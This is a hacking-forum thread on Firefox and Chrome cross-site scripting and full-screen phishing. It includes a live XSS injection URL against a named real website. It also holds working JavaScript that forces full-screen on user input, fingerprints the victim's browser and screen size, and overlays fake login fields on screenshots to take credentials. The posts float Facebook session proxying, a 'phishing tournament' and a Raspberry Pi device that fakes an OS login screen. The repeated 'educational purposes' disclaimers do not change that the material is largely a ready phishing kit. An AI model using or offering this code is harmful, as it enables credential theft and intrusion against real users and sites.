Firefox Cross-Site Scripting (XSS)

Jackbox

Active Member
Jan 2, 2016
https://irandishwasher.ir/wp-admin/js/widgets/upgrade/error.php?websrc=53eeffff1b67e3824a25dbac7373fc5c&dispatched=790047563&id=79004756353eeffff1b67e3824a25dbac7373fc5c&email=a'lol'>">lol<b>heh<h1>no<style>body{background-color:magenta;

This will do a few things, including setting a new background color.



Even if someone has a firewall here or there, the above will trigger an event on scroll.

This could result in a redirect, pop open a fake Facebook login, or other such behavior. Keep in mind it is also possible in some browsers to trigger full-screen by pressing a key (or keys). From full-screen, one could grab the browser's screen resolution/dimensions and then display a fake login page to the victim. For example, we could generate fake logins for my.whatever.com based on [email protected], with the fake URL matching whatever.com, position the login boxes to overlay the fake login page, etc.

This level of advanced phishing page display would make people's security headache multiply tenfold.

I may generate a PoC (Proof-of-Concept) just for educational purposes.

Going full screen on input can be demonstrated in this R4P3 forum posting. If you want a demo of what type of nightmare can occur, then simply go here: https://fiddle.jshell.net/q4ck7x79/show/

Firefox ironically handles this more securely than Chrome, while Firefox appears to lack certain XSS protection(s).

A little confused why security focus seems separated between the browsers. Perhaps I will make a video on how one could exploit this successfully, as I mentioned previously, strictly for educational purposes.

Another trick I am thinking of is drawing a fake tab UI at the top of the page, so when someone clicks - trigger full screen and fake login.

Also a fake window UI based on operating system detection.. would such a PoC be powerful enough to change web browser security somewhat? Also, the .gov example was found with a simple Google dork I made up.


Simply find any PHP files on a domain; any dynamically scripted files on a server are a GREAT place to look for dynamic content issues.
 

Asphyxia

Owner
Administrator
Apr 25, 2015
Here is an example:

Now for simply adding in detection of resolutions, drawing the input boxes and buttons, and then sending the data over to, for example, a proxy service that either authenticates the user (or not).

Hell, we could even really fully web proxy their entire Facebook experience which would provide an actual full-screen Facebook experience to the user through a web proxy of sorts.

This could be weird, but if possible, I think phishing success could go up with this method. This is for education purposes only.

Update: something wrong in Firefox:
Code:
An iframe which has both allow-scripts and allow-same-origin for its sandbox attribute can remove its sandboxing. show
SyntaxError: expected expression, got '<'
light:56

TypeError: document.getElementById(...) is null
...
...
Request for fullscreen was denied because at least one of the document’s containing elements is not an iframe or does not have an “allowfullscreen” attribute. light
TypeError: The expression cannot be converted to return the specified type.
Request for fullscreen was denied because at least one of the document’s containing elements is not an iframe or does not have an “allowfullscreen” attribute. light
TypeError: The expression cannot be converted to return the specified type.

Assuming the fix will be easy; further testing is due. The above demo works perfectly in a 1920-wide Google Chrome browser.
 

Asphyxia

Want to join the phishing tournament? Go over here https://r4p3.net/threads/enter-phishing-tournament-and-you-could-win-5-000.7942/#post-71283

Cool news, found a way to make Firefox go fully black screen?! Honestly not sure wtf is going on here, but worth looking into..

Code:
<center><img src="https://i.imgur.com/FEfW3TO.png"></center>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.4/jquery.min.js"></script>

<script>
function detectVictim()
{
    alert(navigator.userAgent);
}

// Wipe the page, paint the fake screenshot and go full screen.
// Must run from a user gesture, hence the mouse/key listeners below.
function phullScreen()
{
    document.body.innerHTML = '';
    document.body.style.backgroundImage = "url('https://i.imgur.com/aVVdsJw.png')";
    var el = document.documentElement,
        rfs = el.requestFullscreen
           || el.webkitRequestFullScreen
           || el.mozRequestFullScreen
           || el.msRequestFullscreen;
    if (rfs) {            // guard: rfs is undefined where the API is missing
        rfs.call(el);
    }
    detectVictim();
}

addEventListener("mouseup",   function() { phullScreen(); });
addEventListener("keypress",  function() { phullScreen(); });
addEventListener("keyup",     function() { phullScreen(); });
addEventListener("mousedown", function() { phullScreen(); });
</script>

Could have just been image loading.. anyway, I have a modernized script to support resolutions.

Code:
<center><img src="https://i.imgur.com/FEfW3TO.png"></center>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.4/jquery.min.js"></script>

<script>
function detectVictim()
{
    //alert(navigator.userAgent);
    var victimAgent = navigator.userAgent;

    var usesChrome  = victimAgent.includes("Chrome/");
    var usesFirefox = victimAgent.includes("Firefox/");   // not used yet
    var usesIE      = victimAgent.includes("Trident/");   // not used yet

    var victimWidth  = screen.width;
    var victimHeight = screen.height;
    //alert(victimWidth);

    if (usesChrome)
    {
        // One screenshot per resolution, e.g. browser/Chrome/1920x1080.PNG
        document.body.style.backgroundImage = "url(browser/Chrome/" + victimWidth + "x" + victimHeight + ".PNG)";

        // Fake input placed over the screenshot's login box (1920-wide coordinates)
        document.body.innerHTML = '<input type="text" value="[email protected]" style="position:absolute; top: 106px; left: 786px;width: 152px;">';
    }
}

// Wipe the page and go full screen; must run from a user gesture (listeners below).
function phullScreen()
{
    document.body.innerHTML = '';
    var el = document.documentElement,
        rfs = el.requestFullscreen
           || el.webkitRequestFullScreen
           || el.mozRequestFullScreen
           || el.msRequestFullscreen;
    if (rfs) {            // guard: rfs is undefined where the API is missing
        rfs.call(el);
    }
    detectVictim();
}

addEventListener("mouseup",   function() { phullScreen(); });
addEventListener("keypress",  function() { phullScreen(); });
addEventListener("keyup",     function() { phullScreen(); });
addEventListener("mousedown", function() { phullScreen(); });
</script>

I am thinking that for every resolution, much like having a unique .PNG file for each resolution, also having a resolution-specific coordinate map (top, left, absolute, etc) for inputs such as text, buttons/submit, etc. This is very simple with JQuery, awesome explanation over here https://stackoverflow.com/a/6802969

Code:
var blahclass =  $('.blah');
blahclass.css('position', 'absolute');
blahclass.css('top', 0); //or wherever you want it
blahclass.css('left', 0); //or wherever you want it

Similar to the document.body.style.backgroundImage = "url(browser/Chrome/"+screen.width+"x"+screen.height+".PNG)"; bit, we could most probably import a resolution specific set of variables for positioning of elements to match up with the image. This is somewhat like CSS image maps with links.

Why does this work, though? The process could be more automated, but this type of framework allows somewhat more complex attacks with a simplistic approach. Screenshot per resolution, coordinate-map elements (especially login boxes and submit for taking credentials), and lastly this is a fresh take on phishing. I am honestly very curious why this type of attack is not more common. Speaking of which, this made me think of another awesome concept: why not take a full screen capture of the screen input, then take a Raspberry Pi connected to WiFi/mobile network.. and forward domain credentials. Not sure if anyone understands what I am saying, but basically a drop 'n' run Raspberry Pi that essentially mimics the Windows/Linux login screen exactly. Detectable (fairly quickly), but you would get credentials very quickly.
 